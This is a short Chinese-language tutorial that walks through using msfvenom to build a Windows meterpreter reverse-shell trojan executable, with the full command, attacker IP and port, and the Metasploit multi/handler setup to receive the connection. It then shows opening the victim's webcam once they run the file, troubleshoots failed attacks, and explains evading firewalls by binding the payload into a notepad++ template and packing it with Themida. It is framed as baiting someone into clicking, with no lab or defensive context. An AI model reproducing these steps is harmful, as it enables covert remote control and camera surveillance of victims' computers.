msfvenom
msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线[*msfvenom在shell里使用,不是msfconsole终端]
生成exe远程木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.182.130 lport=9999 -f exe -o demo9999.exe
请注意如果桌面没有请查看自己当前在哪个路径创建的
进入msfconsole配置必选项
进入msfconsole
选择模块use exploit/multi/handler
查看必选项配置show options
把这个攻击载荷换成我们的windows/x64/meterpreter/reverse_tcp
ip和端口和上面我们生成的木马配置一样
运行等待鱼儿上钩
run运行完成之后 就等待有人点击木马文件
我这边演示一个打开摄像头
webcam_list 查看他有没有摄像头
webcam_stream打开摄像头
出现问题解决方法
1.被攻击方的防火墙是否关闭?
2.生成木马文件的地址是是否为kali的ip地址(ip add查看)?端口是否有被占用?
3.被攻击方是否是windows系统?
扩展如果想在被攻击方防火墙打开的情况攻击该怎么办?
第一种捆绑木马
-x参数的意思是我们去套用这个notepad++的模板来实现骗过防火墙
首先要确定自己电脑有没有这个软件放到root所在的位置才可以替换
第二种加壳(压缩壳 加密壳)
我这边使用的软件是Themida